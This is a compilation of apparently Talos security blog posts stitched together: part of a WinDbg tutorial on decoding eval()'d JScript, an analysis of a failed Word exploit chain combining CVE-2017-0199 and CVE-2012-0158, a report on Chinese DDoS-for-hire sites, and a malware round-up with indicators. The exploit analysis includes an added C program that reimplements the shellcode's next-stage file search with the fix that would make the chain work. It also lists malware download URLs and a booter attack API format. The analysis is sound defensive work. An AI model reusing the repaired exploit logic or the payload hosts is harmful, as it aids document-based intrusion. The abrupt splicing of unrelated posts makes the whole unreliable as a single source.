var test = "var oShell = new ActiveXObject(\"Shell.Application\");var commandtoRun = \"notepad.exe\"; oShell.ShellExecute(commandtoRun,\"\",\"\",\"\",\"1\");"
eval(test)

var encoded = "dmFyIG9TaGVsbCA9IG5ldyBBY3RpdmVYT2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpO3ZhciBjb21tYW5kdG9SdW4gPSAiY2FsYy5leGUiOyBvU2hlbGwuU2hlbGxFeGVjdXRlKGNvbW1hbmR0b1J1biwiIiwiIiwiIiwiMSIpOwo="
eval(Base64.decode(encoded))
This script performs two different kinds of eval() call. The first passes a string to be executed directly (in the listing, the ShellExecute call launching notepad.exe); the second passes a base64-encoded string that is decoded at run time before being evaluated (the encoded string in the listing decodes to the same ShellExecute call with calc.exe). Note that Base64.decode is not a built-in JScript function; a helper object providing it has to be defined elsewhere in the script.

The eval() function itself is implemented in jscript.dll (breakpoint: bp jscript!JsEval). It calls jscript!COleScript::Compile to compile the source string passed to eval() before executing it:
0:000> sxe ld jscript;g
ModLoad: 00007fff`9e650000 00007fff`9e70c000 C:\Windows\System32\jscript.dll
ntdll!NtMapViewOfSection+0x14:
00007fff`c8e658a4 c3 ret
0:000> bp jscript!JsEval
0:000> g
Breakpoint 0 hit
jscript!JsEval:
00007fff`9e681960 488bc4 mov rax,rsp
0:000> u rip L50
jscript!JsEval:
00007fff`9e681960 488bc4 mov rax,rsp
00007fff`9e681963 48895810 mov qword ptr [rax+10h],rbx
00007fff`9e681967 48897018 mov qword ptr [rax+18h],rsi
00007fff`9e68196b 48897820 mov qword ptr [rax+20h],rdi
[...redacted…]
00007fff`9e681a81 488364242000 and qword ptr [rsp+20h],0
00007fff`9e681a87 e80c3cfdff call jscript!COleScript::Compile
00007fff`9e681a8c 89455f mov dword ptr [rbp+5Fh],eax
00007fff`9e681a8f 8bf8 mov edi,eax
00007fff`9e681a91 85c0 test eax,eax
00007fff`9e681a93 7923 jns jscript!JsEval+0x158 (00007fff`9e681ab8)
We can breakpoint at jscript!COleScript::Compile and dump its source argument to obtain both scripts in clear text: the string passed directly to eval() and the decoded form of the base64-encoded one. The breakpoint command below follows two pointer indirections from the second argument (rdx+0x10, then +0x8) to reach the wide-character source string, dumps it with du and continues execution:
0:000> bp jscript!COleScript::Compile "r $t1 = poi(rdx+0x10);r $t2 = poi($t1+0x8);du $t2;g";g
jscript!COleScript::Compile:
00007fff`9e715698 4053 push rbx
0:000> g
0000019b`d23f6408 "var oShell = new ActiveXObject(""
0000019b`d23f6448 "Shell.Application");var commandt"
0000019b`d23f6488 "oRun = "calc.exe"; oShell.ShellE"
0000019b`d23f64c8 "xecute(commandtoRun,"","","","1""
0000019b`d23f6508 ");."
80070002 The system cannot find the file specified.
0000019b`d473a1b0 "var oShell = new ActiveXObject(""
0000019b`d473a1f0 "Shell.Application");var commandt"
0000019b`d473a230 "oRun = "notepad.exe"; oShell.She"
0000019b`d473a270 "llExecute(commandtoRun,"","","","
0000019b`d473a2b0 ""1");"
ntdll!NtTerminateProcess+0x14:
00007fff`c8e65924 c3 ret

Conclusion


WinDBG is an extremely powerful tool that can help not only in the analysis of .NET files, but also in understanding the execution of JavaScript by wscript.exe. In many cases WinDBG is overkill for understanding a single JavaScript file; however, it provides a different view of a script's behaviour and facilitates the analysis of complex, heavily obfuscated JavaScript.

Appendix


Python script to resolve the implementing DLL from a COM object name (ProgID). Usage: python get_library.py Shell.Application

import sys
from winreg import (HKEY_CLASSES_ROOT, ConnectRegistry, OpenKey,
                    QueryValue, QueryValueEx)

try:
    objectName = sys.argv[1]
except IndexError:
    sys.exit(1)

try:
    hReg = ConnectRegistry(None, HKEY_CLASSES_ROOT)
    # HKCR\<ProgID>\CLSID holds the class identifier for the object name
    hCLSIDKey = OpenKey(hReg, objectName + "\\CLSID")
    CLSID = QueryValue(hCLSIDKey, "")
    if CLSID:
        hKey = OpenKey(hReg, "CLSID\\" + CLSID)
        description = QueryValue(hKey, "")
        # InProcServer32 names the DLL that implements the object
        hKey = OpenKey(hReg, "CLSID\\" + CLSID + "\\InProcServer32")
        dll = QueryValueEx(hKey, "")[0]
        print("Object Name: " + objectName)
        print("CLSID: " + CLSID)
        print("Description: " + description)
        print("dll: " + dll)
    else:
        print("No CLSID")
except OSError as e:
    print("Error: " + str(e))
    sys.exit(2)

When combining exploits for added effect goes wrong


Introduction


Since its public disclosure in April 2017, CVE-2017-0199 has been frequently used in malicious Office documents. The vulnerability allows an attacker to embed an Ole2Link object in an RTF document that causes Microsoft Word to retrieve a remote HTA (HTML Application) file and execute it when the document is opened and parsed.

In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, CVE-2012-0158, possibly in an attempt to evade the user prompt displayed by Word, or to reach code execution via a different mechanism. It may also have been just a test run of a new concept. In any case, the attackers made mistakes which made the attack a lot less effective than it could have been.

Analysis of the payload highlights the potential for the Ole2Link exploit to launch other document types, and also demonstrates a lack of rigorous testing procedures by at least one threat actor.

Attackers are obviously trying to find a way around known warning mechanisms alerting users about potential security issues with opened documents. In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain and fails.

Although this attack was unsuccessful it has shown a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. It may have been an experiment that didn’t quite work out, or it may be indication of future attacks yet to materialise.


Standard CVE-2017-0199 exploitation


A typical attack exploiting CVE-2017-0199 consists of an email campaign distributing a malicious RTF document. The vulnerability exists in the code that handles Ole2Link embedded objects: including an Ole2Link in an RTF document causes Word to load another, remote document within its own process context.


Standard CVE-2017-0199 flow

If the remote OLE2Link points to an HTML application file (HTA file type), vulnerable Word and WordPad versions will parse and execute the application even if the user chooses not to allow inclusion of the remote content. A possible sign of exploitation attempt of CVE-2017-0199 is this Word prompt to the user:

Word prompt displayed to the user before potential CVE-2017-0199 exploit attempt

Modified CVE-2017-0199 flow


In the case of the modified exploit flow we analyzed, the attack started with an email message containing a malicious attachment. The email employed the usual social engineering tricks to entice the user to open and read the attached document. Referring to the attachment as a purchase order coming from an unknown "partner" is a very common social engineering trick of spammed malware.

Email message launching the modified attack

The document attached to the email message is an RTF file including an Ole2Link to a remote document hosted at hxxp://multplelabs [dot] com/ema/order.doc. In this case, the MIME content type of the remote document observed in the packet capture of the attack was not the expected application/hta but application/msword, which was enough to motivate us to dig a little deeper and find out what the attackers were trying to achieve.

The first surprising thing is that the vulnerable version of Word used for the analysis crashed before it managed to display the prompt commonly seen with CVE-2017-0199 exploitation. Instead of displaying the prompt, Word started to convert the downloaded document, hung, and eventually crashed with a memory access fault.

Word crashes without the prompt

The crash was caused not by the first exploit stage using CVE-2017-0199 but by the second stage using CVE-2012-0158. Here we see shellcode embedded in an MSComctlLib.ListViewCtrl.2 ActiveX control, a telltale sign of CVE-2012-0158. The exploit buffer begins with a ROP chain that runs when the vulnerability is triggered; once the ROP chain has set the right permissions on the memory block containing the rest of the shellcode, the first shellcode stage executes.

First stage shellcode for CVE-2012-0158

This stage is responsible for the application crash. The attackers did not seem to have a good quality assurance process, or perhaps the technical expertise to understand what would happen if they simply combined an automatically generated CVE-2012-0158 exploit with CVE-2017-0199.

The shellcode starts by resolving several API addresses, then traverses all open files by brute-forcing file handle values: it starts from zero and increases the value by four for every attempt (Windows handle values are multiples of four). For each handle that exists, the shellcode calls GetFileSize with the handle as the parameter; if the file size is within the expected range it maps the file into memory to perform a file type check.

Checking the file size and finding file type

The shellcode here incorrectly assumes that any open file which passes the size check and is an RTF must be the document containing the next shellcode stage. Once the size and type checks pass, it reads the mapped file looking for the next-stage marker, which in our test is never found: the original CVE-2017-0199 carrier file is still open and satisfies both conditions, and since it was opened before the CVE-2012-0158 document its handle value is smaller, so the shellcode reads it first.

First stage shellcode looking for the next shellcode stage marker

The shellcode searches for the next-stage marker 0xfefefefefeffffffff in the wrong document and does not correctly bound its reads to the document length, so it eventually reads past the end of the mapped memory block and triggers a memory access violation.

Had the attackers been just a little more careful, they would have noticed this problem and could easily have fixed it, making the two exploits work together without the prompt to load remote content ever being displayed to the end user.

One possible fix is to change a single byte to make the file size limits a bit stricter, so that the original CVE-2017-0199 carrier falls outside the accepted range. The other, slightly more involved, is to handle the case where the marker is not found in a candidate RTF by moving on to the next handle, on the assumption that the targeted Word process may already have other RTF documents open that satisfy the size condition.
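The selection logic described above, with both fixes applied, as an added example written for this write-up (it is not the attackers' shellcode or Talos code). The Windows calls the shellcode makes (handle brute force, GetFileSize, MapViewOfFile) are replaced by a table of in-memory buffers so the logic runs offline; the size window, the RTF signature check and the byte order of the marker are assumptions, and the two sample documents are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Next-stage marker as the post writes it (0xfefefefefeffffffff). Treating
 * it as this byte sequence is an assumption; the page gives no byte order. */
static const uint8_t STAGE2_MARKER[9] =
    {0xfe, 0xfe, 0xfe, 0xfe, 0xfe, 0xff, 0xff, 0xff, 0xff};

/* Accepted file size window. The real limits are not on the page; these are
 * placeholder values for the example. */
#define MIN_CANDIDATE_SIZE 64u
#define MAX_CANDIDATE_SIZE (4u * 1024u * 1024u)

/* Stand-in for an open file after GetFileSize and MapViewOfFile.
 * data == NULL models a handle value that is not open. */
typedef struct {
    const uint8_t *data;
    size_t len;
} mapped_file;

/* Size and type check the shellcode performs: inside the window and starting
 * with the RTF signature. Both the CVE-2017-0199 carrier and the CVE-2012-0158
 * document pass this check, which is the root of the failure. */
int looks_like_candidate(const uint8_t *buf, size_t len)
{
    if (len < MIN_CANDIDATE_SIZE || len > MAX_CANDIDATE_SIZE)
        return 0;
    return memcmp(buf, "{\\rtf", 5) == 0;
}

/* Bounds-checked marker search. The loop condition stops before a comparison
 * would extend past the mapping; this is the check the shellcode lacks.
 * Returns the marker offset, or -1 if it is absent. */
long find_stage2_marker(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i + sizeof STAGE2_MARKER <= len; i++)
        if (memcmp(buf + i, STAGE2_MARKER, sizeof STAGE2_MARKER) == 0)
            return (long)i;
    return -1;
}

/* Walk the handle table in ascending order (handle value = 4 * index, as the
 * shellcode brute-forces handles in steps of four). Returns the index of the
 * first RTF that actually contains the marker, or -1. An RTF without the
 * marker is skipped rather than assumed to be the right file. */
int pick_stage2_file(const mapped_file *files, int count, long *marker_offset)
{
    for (int idx = 0; idx < count; idx++) {
        if (files[idx].data == NULL)
            continue;                       /* handle not open */
        if (!looks_like_candidate(files[idx].data, files[idx].len))
            continue;                       /* wrong size or not an RTF */
        long off = find_stage2_marker(files[idx].data, files[idx].len);
        if (off < 0)
            continue;                       /* RTF, but no second stage in it */
        *marker_offset = off;
        return idx;
    }
    return -1;
}

/* Constructed scenario (sample data, not the real documents): handle 0 is the
 * CVE-2017-0199 carrier RTF, opened first and lacking the marker; handle 4 is
 * closed; handle 8 is the CVE-2012-0158 RTF with the marker at offset 100. */
static uint8_t carrier_rtf[256];
static uint8_t second_rtf[256];
long demo_marker_offset = -1;   /* offset found by the last demo_scenario() */

int demo_scenario(void)
{
    memset(carrier_rtf, 'A', sizeof carrier_rtf);
    memcpy(carrier_rtf, "{\\rtf1", 6);
    memset(second_rtf, 'B', sizeof second_rtf);
    memcpy(second_rtf, "{\\rtf1", 6);
    memcpy(second_rtf + 100, STAGE2_MARKER, sizeof STAGE2_MARKER);

    mapped_file handles[3] = {
        {carrier_rtf, sizeof carrier_rtf},
        {NULL, 0},
        {second_rtf, sizeof second_rtf},
    };
    return pick_stage2_file(handles, 3, &demo_marker_offset);
}

int main(void)
{
    int idx = demo_scenario();
    printf("stage 2 found via handle %d at offset %ld\n", idx * 4, demo_marker_offset);
    return idx == 2 ? 0 : 1;
}
```

With the carrier document at the lowest handle value, the original shellcode would stop at it and read off the end of the mapping; the version above skips it and lands on the second document. Tightening MIN_CANDIDATE_SIZE or MAX_CANDIDATE_SIZE to exclude the carrier is the single-byte fix the post mentions.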

Interestingly, the shellcode in the document containing the CVE-2012-0158 exploit executes successfully when no other RTF files are open, so we analysed the remaining stages for completeness.

Second stage shellcode


The second-stage shellcode is somewhat more complex. It starts by resolving the required API functions in ntdll.dll, which it uses to launch an instance of svchost.exe in a suspended state and to overwrite that process's original entry point with the final "download and execute" stage, which in turn launches the executable payload.

Finding ntdll.dll APIs to inject the last stage and resume svchost.exe process

The last shellcode stage, injected into svchost.exe, uses the URLDownloadToFile API to download an executable from the command and control server into the temporary files folder as name.exe, then calls ShellExecute to launch the final payload.

Download and execute stage

The downloaded executable payload is a packed VB dropper which drops an older Ramnit version, but based on the observed traffic to the command and control server it also runs Lokibot. Ramnit is a well-known self-replicating information-stealing bot that includes a rootkit to hide its presence from the user and from security products; it is already well documented, and further analysis of this sample is outside the scope of this post. Despite its age, Ramnit is still a malware family commonly encountered by Talos. It is possible that the attackers intended to launch a Lokibot campaign and that the sample was infected by Ramnit's file-infection component along the way.

DNS activity for multplelabs.com

The domain hosting the malware and the command and control server was registered in October 2016 and is likely a compromised site, although it also appears to have been used by other Lokibot campaigns. Its DNS activity shows two distinct spikes, which likely correspond to two unsuccessful spam campaigns: there is no subsequent rise in activity that would indicate infected systems communicating with the command and control server.

The DNS activity is therefore consistent with our analysis of why the attack failed.

Conclusion


CVE-2017-0199 is one of the vulnerabilities most commonly exploited by malicious documents distributed in spam campaigns. Previous work indicates that its popularity with attackers has overtaken that of CVE-2012-0158.

In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain. In the case of this campaign the attackers made a major mistake that prevented the intended download and execution of the Ramnit payload.

Attempted combined attack stages

One has to wonder why the attackers combined a newer and an older exploit at all. The chain fails if the targeted system is patched against either vulnerability, and if the system was still vulnerable to CVE-2012-0158 it would have been much simpler to use that single exploit.

One assumption is that the combination was meant to avoid the Word prompt, which might raise suspicion with the target end user. Another possibility is that it was meant to evade behavioural detection systems that trigger on the combination of an Ole2Link in a Word document and the download of an HTA file.

This attack was unsuccessful, potentially indicating poor testing or quality control procedures by the attackers. However, this does show a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. This attack may have been an experiment that didn't quite work out, or it may be indication of future attacks yet to materialise.

Coverage


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella prevents DNS resolution of the domains associated with malicious activity.

Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.

IOCs


Documents

5ae2f13707ee38e4675ad1bc016b19875ee32312227103d6f202874d8543fc2e - CVE-2017-0199
6a84e5fd6c9b2c1685efc7ac8d763048913bad2e767b4958e7b40b4488bacf80 - CVE-2012-0158

Executables

351aec22d926b4fb7efc7bafae9d1603962cadf0aed1e35b1ab4aad237723474
f34e5af97ccb3574f7d5343246138daf979bfd1f9c37590e9a41f6420ddb3bb6
43624bf57a9c7ec345d786355bb56ca9f76c226380302855c61277bdc490fdfe
d4fbca06989a074133a459c284d79e979293625262a59fbd8b91825dbfbe2a13

URLs

hxxp://multplelabs[dot]com/ema/order.doc - CVE-2012-0158
hxxp://multplelabs[dot]com/ema/nextyl.exe - dropper
hxxp://multplelabs[dot]com/freem/50/fre.php - Lokibot C2

Booters with Chinese Characteristics: The Rise of Chinese Online DDoS Platforms

This post was authored by Dave Liebenberg


In the past few months, Talos has observed an uptick in the number of Chinese websites offering online DDoS services. Many of these websites have a nearly identical layout and design, offering a simple interface in which the user selects a target's host, port, attack method and attack duration, and the majority have been registered within the past six months. However, the websites operate under different group names and have different registrants, and Talos has observed administrators of these websites launching attacks on one another. Talos set out to identify the actors responsible for creating these platforms and to understand why they have become more prevalent lately.


In this blog post, we will begin by looking at the DDoS industry in China and charting the shift toward online DDoS platforms. Then we will examine the types of DDoS platforms created recently, noting their similarities and differences. Finally, we will look into the source code likely responsible for the recent increase in these nearly identical DDoS websites.


DDoS-as-a-Service in China


DDoS tools and services remain some of the most popular offerings in the Chinese underground market. A look at one of the most popular Chinese marketplaces, DuTe (独特), reveals a variety of DDoS-related tools, including actual attack tools as well as associated tools such as brute forcers for different vectors including SSH and RDP. 

In addition, Chinese social media applications such as WeChat and QQ have hundreds of group chats devoted to DDoS groups, tools, malware, and the exchange of targets. The people interacting in these channels include members of hacking groups, customers, as well as agents and advertisers who can act as intermediaries. 

Previously, the predominant offering in these group chats were tools that users could purchase, download, and then operate from their own machine. A good example of this type of tool was the TianFa Pressure Testing System.

TianFa DDoS tool


These kinds of tools manage and provide information about a user’s botnet, and then allow the user to customize an attack event, selecting a target and choosing an attack method. Users can purchase the tool, download a copy, and use it with their own servers and botnets. Occasionally, hacker groups also bundle servers or a certain amount of bots with purchases, or include brute-forcing tools to help users grow their own botnet, but the end-user would be in charge of maintaining and deploying the tool.

The Rise of Online DDoS Platforms



Recently, Talos has noticed a gradual paradigm shift underway in the group chats. Advertisements for online DDoS platforms have begun to appear more frequently.

Advertiser promotes “ShaShen” Online DDoS Website


After inspecting several of these websites, Talos noticed that many had identical login and registration pages, down to the same background image:






In addition, Talos observed that many of these websites have a nearly identical design and layout, displaying the number of active users and servers online as well as the total number of attacks carried out (although these numbers vary between groups). The sites also contain announcements from group administrators on recent updates to the tool, its capabilities, or restrictions on its use. In the sidebar, users can register an account, purchase an activation code to begin launching attacks, and then attack a target, either through the graphical interface on the website or through identical command line calls which look like this:

http://website_name/api.php?username=&password=&host=&port=&time=&method=


Nearly identical website layout for ShaShen DDoS group and Wang Zhe sec DDoS group.



Besides the uncanny similarities in design and function, the majority of the websites had the word "ddos" in their domain names, e.g. "shashenddos.club" or "87ddos.cc." Since these sites were all recently registered, besides relying on intelligence from Chinese social media, Talos was able to identify several new websites by using Cisco Umbrella's Investigate tool to run a regex search for recently registered domains containing "ddos". Using these combined search methods, Talos identified 32 nearly identical Chinese online DDoS websites (presumably there are more, since not all of these websites have "ddos" in their domain name).

Because of the similarities in the pages, and the fact that some individuals registered multiple sites for the same group, we initially suspected that one actor was potentially responsible for all the sites and was merely operating under different aliases. In order to test our theory we registered an account with each site and also used Cisco Umbrella’s investigate tool to examine each site’s registration info.

We soon revised our one-actor theory. After registering accounts at various sites we noticed that many employed different third-party Chinese payment websites where users could purchase activation codes (typical prices range from around 20 RMB for a day-use code to around 400 RMB for a month-use pass). In addition, the announcements on the pages advertised different tool capabilities (some claimed attack power of 30-80 Gbps, while others went as high as 300 Gbps), as well as different contact information, including various QQ accounts for customer service and group chat numbers for customers and administrators to interact. There were also vast differences in the numbers of attacks and users, with one page (www[.]dk[.]ps88[.]org) listing 168,423 attacks made by 44,238 users and another (www[.]pc4[.]tw) listing 24 attacks made by 13 users.

The websites' registration information also revealed key differences. Most of the websites had different registrant names and emails, as well as different registrars. However, there were some similarities as well: almost all used Chinese registrars, the majority were registered in the past three months, and nearly all were registered in the past year. In addition, over half were hosted on Cloudflare IPs.

Our final confirmation that different actors were behind these websites came when Talos was monitoring a QQ group chat channel affiliated with one of these online DDoS platforms called Wang Zhe sec. We observed a group member requesting an attack on a rival online DDoS group, 87 DDoS, with which we had also already registered an account.

A member of Wang Zhe sec chat group requests attack on rival online DDoS website


Talos joined a number of group chats associated with online DDoS platforms and observed multiple actors discussing launching DDoS attacks on rival groups. Indeed, a look at some of the traffic of these online DDoS websites indicates that they had possibly experienced DDoS attacks.

Traffic for the website of 87 DDoS reveals dramatic spike around July 1, 2017


A Glimpse Behind the Curtain



We had strong indications that multiple groups were building nearly identical online DDoS platforms, but still had no idea why they were using the same layout or why they had all begun to appear so recently. We began to gain insight into the story behind these questions after an actor in a group chat run by a Chinese hacker group posted a screenshot of the admin page for his online DDoS platform:

An actor posts a screenshot of their admin panel for their online DDoS platform


The screenshot showed a setup page where the actor could choose a name for the site, write a description, and provide links to the terms of service and URLs. Several items of interest jumped out at us, providing further avenues for research. First, we noticed the word "Gemini" in the top right corner. Second, we noticed the unique URL "/yolo/admin/settings". Finally, we noticed a button at the bottom of the screen where an administrator could select "Cloudflare mode", which reminded us how many of the websites had been hosted on Cloudflare IPs.

Finding and Analyzing the Source Code



We now had a hunch that the rise of these nearly identical websites was due to some sort of shared source code, which was likely being offered on Chinese underground hacking forums and marketplaces. We went to several of the forums and searched for the “/yolo/admin/settings” URL present in the screenshot. We discovered that several forums had posts offering the sale of source code for an online DDoS platform, all identifying it as a foreign DDoS platform that had been translated into Chinese.

Many of the postings were made in early 2017 or late 2016, corresponding to the timeline of the rise in the DDoS platforms. And the pictures in the advertisements looked identical to websites we had been seeing:

Example of an advertisement for the DDoS platform source code. Description reads: “This is a foreign DDoS platform source code, it has already been Sinicized, everybody is welcome to test if they want to start a DDoS platform.” Note the design and the settings panel which looks similar to the screenshot an actor posted in a QQ channel, and includes the “Gemini” in the top right corner.


Talos was able to obtain a copy of the source code and went about analyzing it. It was clear that the source code corresponded to the DDoS websites we observed. The PHP files contained icons that matched those found on the websites. In addition, the background that the majority of these sites employ was also found in the images folder:



The source code revealed that the platform relied on Bootstrap front-end design and ajax to load content. In the CSS files we found an author named as Pixelcave. Researching Pixelcave, we discovered that they offered Bootstrap-based website designs that looked similar to the online Chinese DDoS websites we had examined. We also noticed that Pixelcave’s logo was present in the top right hand corner of many of the DDoS websites we had found and was also included as an icon in the source code.

Logo for Pixelcave, which was present on all the DDoS websites we identified.


According to the source code, the platform has functions which pull information from MySQL databases and assess a user's standing (i.e. the number of attacks, duration of attacks, and number of concurrent attacks a user is allowed based on the payments they have made). It then allows a user to input a host and select an attack method (e.g. NTP, L7) and duration. Provided that the method is supported by the actors and the target is not blacklisted, it calls the attack servers to begin carrying out the attack.

Interestingly, the source code provides a blacklist for sites that cannot be attacked, and includes “.gov” and “.edu” sites among them, although these can obviously be modified. In addition, it comes with a preloaded Terms of Service (in Mandarin) which absolves the administrators of the site from any responsibility for “illegal” acts and asserts that its services are only meant for testing purposes.

The code also allows administrators to monitor payments made, outstanding tickets, as well as an overview of the total amount of logins and attacks being contracted, and details about the attacks such as the host, duration of the attack, and which server is conducting the attack. The administrator can also set up an activation code system.

It is clear that the source code was originally written in English, but was modified so that the final platform would display Chinese-language graphics (as advertised). The source code also provides options for administrators to set up payment through PayPal and Bitcoin. Chinese actors would likely replace this with a Chinese payment system, such as third-party payment sites or services like Alipay. In fact, the PayPal icon in one image folder has been altered to resemble the Alipay icon.

It is unclear at the time of this writing where the original source code came from. However, there are several English-language websites offering online DDoS services, such as the tool DataBooter, that have some similarities to the Chinese DDoS platforms: they have a Bootstrap-based design, are hosted on Cloudflare, and have similar graphics conveying the number of attacks, users, and servers online.

Layout for databooter[.]com. The layout is somewhat similar to the Chinese online DDoS websites.


Talos has observed actors selling source code for these types of English-language DDoS platforms on hacker forums in the past few years. It is possible that Chinese actors obtained this source code, or code based on it, and modified it to localize it more to Chinese consumers, though we have not found direct evidence of this.

Conclusion



The recent uptick in Chinese online DDoS platforms seems to be connected to source code for sale on Chinese hacker forums. This source code appears to be a localized version of code originally written for English language online booters.

Online DDoS platforms remain popular because of their easy-to-use interfaces and the fact that they already provide all necessary infrastructure to the user, so there is no need to build a botnet or purchase additional services. Instead, the user purchases an activation code through a trusted payment site and then simply enters in their target. This serves the function of enabling even the most novice of actors the capability to launch powerful attacks, depending on the strength of the DDoS group’s backend infrastructure.

Talos will continue to monitor Chinese hacker forums and group chats for newly-created online Chinese DDoS platforms as well as greater trends emerging in the Chinese DDoS industry.

IOCs:


Online DDoS Websites

www[.]794ddos[.]cn
www[.]dk.ps88[.]org
www[.]tmddos[.]top
www[.]wm-ddos[.]win
www[.]tc4[.]pw
www[.]hkddos[.]cn
www[.]ppddos[.]club
www[.]lnddos[.]cn
www[.]711ddos[.]cn
www[.]830ddos[.]top
www[.]bbddos[.]com
www[.]941ddos[.]club
www[.]123ddos[.]net
www[.]the-dos[.]com
www[.]etddos[.]cn
www[.]jtddos[.]me
www[.]ccddos[.]ml
www[.]87ddos[.]cc
www[.]ddos[.]cx
www[.]hackdd[.]cn
www[.]shashenddos[.]club
www[.]minddos[.]club
www[.]caihongtangddos[.]cn
www[.]zfxcb[.]top
www[.]91moyu[.]top
www[.]xcbzy[.]club
www[.]this-ddos[.]cn
www[.]aaajb[.]top
www[.]ddos[.]qv5[.]pw
www[.]tdddos[.]com
www[.]ddos[.]blue

IPs

104[.]18.54.93
104[.]18.40.150
115[.]159.30.202
104[.]27.161.160
104[.]27.174.49
104[.]27.128.111
144[.]217.162.94
104[.]27.130.205
103[.]255.237.138
45[.]76.202.77
104[.]27.177.67
104[.]31.86.177
103[.]42.212.68
142[.]4.210.15
104[.]18.33.110
104[.]27.154.16
104[.]27.137.58
23[.]230.235.62
104[.]18.42.18
162[.]251.93.27
104[.]18.62.202
104[.]24.117.44
104[.]28.4.180
104[.]31.76.30

Threat Round-up for Aug 11 - Aug 18

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between August 11 and August 18. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

  • Doc.Downloader.Agent-6335676-0
    Office Macro Downloader
    This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable. The execution chain is typically Word -> Shell function -> CMD -> PowerShell download and execute.

  • Doc.Dropper.Agent-6335671-0
    Office Macro Downloader
    This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable.

  • Doc.Macro.JunkCode-6335442-0
    Office Macro
    Malicious Office Macros are obfuscated to prevent easy analysis. At times this results in no-operation-like instructions. These no-operation (junk) instructions create artifacts that can be detected.

  • Win.Trojan.Expiro-6335658-0
    Trojan
    This sample is a Trojan. It complicates automated analysis and manual debugging by using anti-debug techniques, and it needs a properly installed sandbox in order to run.

  • Win.Trojan.Ovidiy-6333880-0
    Trojan
    Ovidiy, or Ovidiy Stealer, is a Windows trojan that is still under active development. It serves as a credential stealer. Although modular in nature, it mostly targets credentials from web browser sessions. It does include some C2 functionality and will beacon out with select host information. The trojan itself is written in a .NET language, and discovered samples are commonly protected with several packers specifically tailored to .NET binaries.

  • Win.Trojan.Tinba-6333828-1
    Trojan
    Tinba is a tiny banking trojan primarily focused on stealing sensitive information from its victims via JavaScript injected into web browsers. The source code for Tinba was leaked in 2014, making it very easy for malware developers to adopt and modify its functionality.

Threats

Doc.Downloader.Agent-6335676-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses
  • 78[.]47[.]139[.]102
  • 193[.]227[.]248[.]241
  • 104[.]160[.]185[.]215
Domain Names
  • campusassas[.]com
  • campuslinne[.]com
Files and or directories created
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\qdvjnh.bat
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\plzea.exe
File Hashes
  • 7ffabe10f4147ce48fc9ae40cdc7778d08ac7881b779743720e2c4313592445b
  • c2a3dcd915905c09026044e8da533455a2742196e4294cfffc000c048c1ea9cc
  • f756ea3c00d7a3dc3ff1c0224add01e8189375a64fbcd5c97f551d64c80cbdba

Coverage

Screenshots of Detection (images not reproduced): AMP, ThreatGrid, Umbrella, Screenshot

Doc.Dropper.Agent-6335671-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • iesimpianti[.]it
  • janssen-st[.]de
Files and or directories created
  • %TEMP%\7E94\3F4A.bat
  • %AppData%\Microsoft\Office\Recent\270700481.doc.LNK
  • %AppData%\Microsoft\Office\Recent\fatt.348.LNK
  • \Users\Administrator\Documents\20170810\PowerShell_transcript.PC.PbSYjzuP.20170810091133.txt
  • %SystemDrive%\~$0700481.doc
  • %AppData%\Microsoft\CHxRthlp\api-pntw.exe
  • \TEMP\~$tt.348.doc
  • %TEMP%\33513.exe
  • %TEMP%\7E94\3F4A.tmp
  • \TEMP\fatt.348.doc
File Hashes

Coverage

Screenshots of Detection (images not reproduced): AMP, ThreatGrid, Umbrella, Screenshot

Doc.Macro.JunkCode-6335442-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value: internat.exe
Mutexes
  • Local\_!MSFTHISTORY!_
IP Addresses
  • 52[.]173[.]193[.]166
  • 185[.]206[.]144[.]152
  • 190[.]107[.]177[.]115
Domain Names
  • plantatulapiz[.]cl
  • kalawatu[.]site
Files and or directories created
  • %TEMP%\CVRDF32.tmp.cvr
File Hashes

Coverage

Screenshots of Detection (images not reproduced): AMP, ThreatGrid, Umbrella

Win.Trojan.Expiro-6335658-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
    • Value: Collection
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • N/A
Files and or directories created
  • \TEMP\60d2422af917cb8aa58c14b8b78d4af112c9c78343da8f7aa3fbcb87be1a4de0.exe
File Hashes

Coverage

Screenshots of Detection (images not reproduced): AMP, ThreatGrid

Win.Trojan.Ovidiy-6333880-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
    • Value: EnableFileTracing
